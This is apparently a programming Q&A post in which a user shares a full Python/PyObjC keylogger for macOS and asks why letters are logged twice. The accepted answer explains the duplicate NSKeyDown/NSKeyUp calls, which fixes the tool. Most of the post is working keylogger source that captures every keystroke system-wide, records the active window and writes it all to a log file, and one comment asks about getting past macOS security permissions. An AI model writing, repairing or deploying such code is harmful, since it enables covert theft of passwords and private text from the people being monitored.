# OS X - Python Keylogger - letters in double

Tags: python, macos, cocoa, keylogger

I'm working on a python Keylogger for OS X. My script is working well, but all the letters are in double in the shell / txt log file. Can anyone tell me why... That's a mystery me for !

```
#!/usr/bin/env python
# -*- coding: UTF-8 -*-


import sys
import os


import exceptions
from Foundation import NSObject, NSLog
from AppKit import NSApplication, NSApp, NSWorkspace
from Cocoa import *
from Quartz import CGWindowListCopyWindowInfo, kCGWindowListOptionOnScreenOnly, kCGNullWindowID
from PyObjCTools import AppHelper
import keycode



evtypes = dict(
    NSLeftMouseDown     = 1,
    NSLeftMouseUp       = 2,
    NSRightMouseDown    = 3,
    NSRightMouseUp      = 4,
    NSMouseMoved        = 5,
    NSLeftMouseDragged  = 6,
    NSRightMouseDragged = 7,
    NSMouseEntered      = 8,
    NSMouseExited       = 9,
    NSKeyDown           = 10,
    NSKeyUp             = 11,
    NSFlagsChanged      = 12,
    NSAppKitDefined     = 13,
    NSSystemDefined     = 14,
    NSApplicationDefined = 15,
    NSPeriodic          = 16,
    NSCursorUpdate      = 17,
    NSScrollWheel       = 22,
    NSTabletPoint       = 23,
    NSTabletProximity   = 24,
    NSOtherMouseDown    = 25,
    NSOtherMouseUp      = 26,
    NSOtherMouseDragged = 27
)

evtypes_rev = dict([[v,k] for k,v in evtypes.items()])

class Hooker(object):
    def __call__(self, *args, **kwargs):
        try:
            items = ' '.join( [ x[0]+"="+unicode(x[1]) for x in kwargs.iteritems()] )
            if (self.__class__.__name__ == "MouseMoveHooker"):
                pass

            else :
                for x in kwargs.iteritems():
                    if x[0] == 'char':
                        print x[1].encode('utf-8')
                        fichier.write("%s" % (x[1].encode('utf-8')))
        except Exception as e:
            print 'Horrific error!', e
            AppHelper.stopEventLoop()
            sys.exit(0)

class KeyHooker(Hooker): pass
class MouseButtonHooker(Hooker): pass
class MouseMoveHooker(Hooker): pass
class ScreenHooker(Hooker): pass

class SniffCocoa:

    def __init__(self):

        self.key_hook = KeyHooker()
        self.screen_hook = ScreenHooker()
        self.currentApp = None

    def createAppDelegate (self) :

        sc = self
        class AppDelegate(NSObject):
            def applicationDidFinishLaunching_(self, notification):
                mask = (
                          NSKeyDownMask 
                        | NSKeyUpMask
                        | NSLeftMouseDownMask 
                        | NSLeftMouseUpMask
                        | NSRightMouseDownMask 
                        | NSRightMouseUpMask
                        | NSMouseMovedMask 
                        | NSScrollWheelMask
                       )
                NSEvent.addGlobalMonitorForEventsMatchingMask_handler_(mask, sc.handler)
        return AppDelegate

    def run(self):
        NSApplication.sharedApplication()
        delegate = self.createAppDelegate().alloc().init()
        NSApp().setDelegate_(delegate)
        self.workspace = NSWorkspace.sharedWorkspace()
        AppHelper.runEventLoop()

    def cancel(self):
        AppHelper.stopEventLoop()

    def handler(self, event):

        try:
            activeApps = self.workspace.runningApplications()
            for app in activeApps:
                if app.isActive():
                    if app.localizedName() != self.currentApp:
                        self.currentApp = app.localizedName()
                        options = kCGWindowListOptionOnScreenOnly 
                        windowList = CGWindowListCopyWindowInfo(options, kCGNullWindowID)

                        for window in windowList:
                            if window['kCGWindowOwnerName'] == self.currentApp:
                                geom = window['kCGWindowBounds'] 
                                self.screen_hook( event=event,
                                                name = window['kCGWindowName'],
                                                owner = window['kCGWindowOwnerName'],
                                                x = geom['X'], 
                                                y = geom['Y'], 
                                                w = geom['Width'], 
                                                h = geom['Height'])
                                break
                    break

            # keys down
            if event.type() in ( NSKeyDown, NSKeyUp ):

                flags = event.modifierFlags()
                modifiers = [] # OS X api doesn't care it if is left or right
                if (flags & NSControlKeyMask):
                    modifiers.append('CONTROL')
                if (flags & NSAlternateKeyMask):
                    modifiers.append('ALTERNATE')
                if (flags & NSCommandKeyMask):
                    modifiers.append('COMMAND')

                self.key_hook(char=keycode.tostring(event.keyCode() ))


        except ( KeyboardInterrupt ) as e:
            print 'handler', e
            AppHelper.stopEventLoop()

fichier = open("LOG.txt", "a")
sc = SniffCocoa()
sc.run()
```

Comment: Is it because you're listening to both `NSKeyDown` and `NSKeyUp`?

Comment: Hi for this to work, how did u bypass OSx security to allow access to control the computer? did u make *.app out of it and gave it rights to control the computer (under security and privacy)???

Answer (score 4, accepted):

Because you are calling key_hook twice: one call for NSKeyDown and one call for NSKeyUp (both produced by a key press).